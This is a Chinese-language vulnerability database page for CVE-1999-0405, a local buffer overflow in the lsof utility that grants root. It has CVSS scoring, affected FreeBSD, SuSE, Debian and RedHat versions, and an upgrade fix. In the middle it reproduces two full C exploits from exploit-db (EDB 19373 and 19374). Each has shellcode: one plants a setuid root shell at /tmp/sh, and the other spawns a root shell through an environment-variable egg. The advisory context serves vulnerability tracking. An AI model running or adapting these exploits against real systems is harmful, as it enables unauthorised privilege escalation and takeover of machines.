CVE-1999-0405
CVSS7.2
发布时间 :1999-02-18 00:00:00
修订时间 :2008-09-09 08:34:29
NMCOE    

[原文]A buffer overflow in lsof allows local users to obtain root privilege.


[CNNVD]lsof缓冲区溢出漏洞(CNNVD-199902-037)

        lsof存在缓冲区溢出漏洞。本地用户可以借助该漏洞获得根特权。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:freebsd:freebsd:2.2.5FreeBSD 2.2.5
cpe:/o:freebsd:freebsd:2.1.7.1FreeBSD 2.1.7.1
cpe:/o:freebsd:freebsd:2.1.6FreeBSD 2.1.6
cpe:/o:suse:suse_linux:4.3SuSE SuSE Linux 4.3
cpe:/o:freebsd:freebsd:2.2.4FreeBSD 2.2.4
cpe:/o:freebsd:freebsd:3.2FreeBSD 3.2
cpe:/o:freebsd:freebsd:2.0.5FreeBSD 2.0.5
cpe:/o:freebsd:freebsd:2.1.0FreeBSD 2.1.0
cpe:/o:suse:suse_linux:4.4SuSE SuSE Linux 4.4
cpe:/o:suse:suse_linux:5.3SuSE SuSE Linux 5.3
cpe:/o:suse:suse_linux:4.2SuSE SuSE Linux 4.2
cpe:/o:suse:suse_linux:5.0SuSE SuSE Linux 5.0
cpe:/o:freebsd:freebsd:2.2.8FreeBSD 2.2.8
cpe:/o:freebsd:freebsd:3.1FreeBSD 3.1
cpe:/o:debian:debian_linux:2.0.5Debian Debian Linux 2.0.5
cpe:/o:freebsd:freebsd:2.2.6FreeBSD 2.2.6
cpe:/o:freebsd:freebsd:3.0FreeBSD 3.0
cpe:/o:redhat:linux:5.2::i386
cpe:/o:freebsd:freebsd:2.2.3FreeBSD 2.2.3
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1
cpe:/o:debian:debian_linux:2.0Debian Debian Linux 2.0
cpe:/o:suse:suse_linux:4.4.1SuSE SuSE Linux 4.4.1
cpe:/o:freebsd:freebsd:2.1.5FreeBSD 2.1.5
cpe:/o:freebsd:freebsd:2.0FreeBSD 2.0
cpe:/o:suse:suse_linux:6.0SuSE SuSE Linux 6.0
cpe:/o:freebsd:freebsd:2.2.2FreeBSD 2.2.2
cpe:/o:suse:suse_linux:5.1SuSE SuSE Linux 5.1
cpe:/o:suse:suse_linux:5.2SuSE SuSE Linux 5.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0405
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0405
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-037
(官方数据源) CNNVD

- 其它链接及资源

http://www.osvdb.org/3163
(UNKNOWN)  OSVDB  3163

- 漏洞信息

lsof缓冲区溢出漏洞
高危 缓冲区溢出
1999-02-18 00:00:00 2005-05-02 00:00:00
本地  
        lsof存在缓冲区溢出漏洞。本地用户可以借助该漏洞获得根特权。

- 公告与补丁

        

- 漏洞信息 (19373)

Debian Linux 2.0/2.0 r5,FreeBSD <= 3.2,OpenBSD 2.4,RedHat Linux 5.2 i386,S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (1) (EDBID:19373)
linux local
1999-02-17 Verified
0 c0nd0r
N/A [点击下载]
source: http://www.securityfocus.com/bid/496/info

Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges.

/*
 * Sekure SDI (Brazilian Information Security Team)
 * lsof local exploit for linux
 * by c0nd0r <condor@sekure.org>
 *
 * Security problem found by HERT. (www.hert.org)
 *
 * -> This little tool will bring you a suid or sgid shell owned by lsof
 *    user (root|kmem usually) at /tmp directory (/tmp/sh).
 *
 * -----------------------------------------------------------------------
 * Code explanation: We've used a unsual technique here.
 * The buffer allocated was too small for the standard expl, so we did a
 * little trick, by overflowing with 'A' till reaching the ret address and
 * then we've filled with NOP and the shellcode just after the modified
 * ret address. So we have a different exploit architeture:
 * [garbage][eip modified][lotsa NOP's][shellcode]
 * That's why we need a bigger offset.
 * -----------------------------------------------------------------------
 *
 * usage ( needa have a little brain):
 *  ./SDI-lsof <offset> (between 373-505)
 *
 * 4 phun - http://www.sekure.org
 * Thanks to jamez, dumped, bishop, bahamas, slide, falcon, vader
 * and guys at #uground (irc.brasnet.org network)
 *
 */


/* change the lsof path if it's needed */
#define PATH "/usr/bin/lsof"


char shellcode[] =
        "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
        "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
        "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
        "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
        "\x40\xcd\x80\xe8\xca\xff\xff\xff/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";


unsigned long getsp ( void) {
  __asm__("mov %esp,%eax");
}

main ( int argc, char *argv[0]) {
  char b00m[220];
  long addr;
  int x, y, offset=380;

  if (argc > 1) offset = atoi(argv[1]);

  for (x = 0; x < 16; x++)
    b00m[x] = 'A';

  addr = getsp() + offset;
  printf ( "SDI-lsof exploiting at 0x%x\n", addr);

  b00m[x++] = addr & 0x000000ff;
  b00m[x++] = (addr & 0x0000ff00) >> 8;
  b00m[x++] = (addr & 0x00ff0000) >> 16;
  b00m[x++] = (addr & 0xff000000) >> 24;

  for ( ; x < 100; x++)
    b00m[x] = 0x90;

  for (y = 0; y < strlen(shellcode); y++, x++)
    b00m[x] = shellcode[y];

  b00m[strlen(b00m)] = '\0';

  printf ( "\nFind a suid shell at /tmp/sh...\n\n");
  execl ( PATH, PATH, "-u", b00m, (char *)0);
  perror ( "execl") ;

}
		

- 漏洞信息 (19374)

Debian Linux 2.0/2.0 r5,FreeBSD <= 3.2,OpenBSD 2.4,RedHat Linux 5.2 i386,S.u.S.E. Linux <= 6.1 Lsof Buffer Overflow Vulnerability (2) (EDBID:19374)
linux local
1999-02-17 Verified
0 Zhodiac
N/A [点击下载]
source: http://www.securityfocus.com/bid/496/info
 
Lsof is an open file management utility included with many linux distributions. When run setuid root or setgid kmem, it is subject to a buffer overflow that can lead to regular users gaining root priveleges.

/* http://www.hackersnetwork.net! */

/*
 *  Xploit for lsof 4.0.4 by Zhodiac <zhodiac@usa.net>
 *  Based on Aleph's article in phrack49
 */

#include <stdlib.h>

#define DEFAULT_OFFSET                   0
#define DEFAULT_BUFFER_SIZE             32
#define DEFAULT_EGG_SIZE               2048
#define NOP                            0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {
   __asm__("movl %esp,%eax");
}

void main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;
  char comando[512];

  if (argc > 1) bsize   = atoi(argv[1]);
  if (argc > 2) offset  = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  printf("\nXploit for lsof 4.04 by zhodiac <zhodiac@usa.net>\n\n");

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%x\n", addr);

  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
    *(addr_ptr++) = addr;

  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;

  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  memcpy(egg,"EGG=",4);
  putenv(egg);
  snprintf(comando,511,"lsof -u %s",buff);
  system(comando);
}
		

- 漏洞信息

3163
lsof Unspecified Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

A local overflow exists in lsof (LiSt Open Files). Details on the function and exploitation were not provided. If exploited, root privileges could be gained.

- 时间线

1999-02-17 Unknow
1999-02-17 Unknow

- 解决方案

Upgrade to version 4.69 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站